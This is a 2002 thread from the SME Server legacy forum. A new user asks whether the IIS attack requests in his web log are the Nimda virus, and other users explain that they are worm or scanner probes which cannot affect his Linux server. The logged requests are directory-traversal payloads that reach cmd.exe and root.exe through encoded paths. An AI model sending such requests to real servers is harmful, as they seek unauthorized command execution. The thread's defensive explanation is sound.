Koozali.org: home of the SME Server
  1. Koozali.org: home of the SME Server
  2. Legacy Forums
  3. General Discussion (Legacy)
  4. Topic: NIMBA
« previous next »
Pages: [1]   Go Down

NIMBA

  • 4 Replies
  • 412 Views

Christian

NIMBA
« on: June 28, 2002, 02:57:16 PM »
I just downloaded SME server from a NL ftp mirror.
6 hours after instalation this code was found in HTTP log
Is it a Virus "Nimba" ????
If yes, How can it be in SME server so fast????????????????
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"

Christian. Denmark
Logged

Jon Blakely

Re: NIMBA
« Reply #1 on: June 28, 2002, 04:12:40 PM »
Christian,

Yes that is NIMDA but it is nothing to worry about, apart from wasting a bit of bandwidth it is harmless. It only affects M$ IIS web servers.
It is not in your server but is infected M$ servers trying to give it you.
You will probably get another one that is a string of NNNNNNN's. That is Code Red or Code Red II. It is also harmless.

Jon
Logged

Holger

Re: NIMBA
« Reply #2 on: June 28, 2002, 04:15:02 PM »
Hej Christian

I think everybody gets those if you're connected to the internet!

It is showing that somebody or something (script kiddies or a vira) is attempting to exploit some security vulnerabilities. Only they are _very_ stupid, since they have not detected that your box is not a windoze box.

Don't worry - it's not harmfull to you except for your lost bandwidth and cpu cycles.

There's nothing you can do about it either :(
It's just the common general pollution of the internet.

Holger
Logged

Johan

Re: NIMBA
« Reply #3 on: June 29, 2002, 03:19:31 PM »
It's not nimda,

it's someone who scans your serv for security flaws..
in this case  he's scanning for the unicode-bug...
but u don;t have to worry,.. you don;t have Nt/iis :)

greetzz
Logged

Christian

Re: NIMBA --THANKS ALL
« Reply #4 on: June 29, 2002, 11:12:17 PM »
Thanks all
I'm new to these servers, have only been working with windows 2000 adv srv.
So thanks again....

Christian.....
one never gets to old to learn something new
Logged
Pages: [1]   Go Up
« previous next »
  1. Koozali.org: home of the SME Server
  2. Legacy Forums
  3. General Discussion (Legacy)
  4. Topic: NIMBA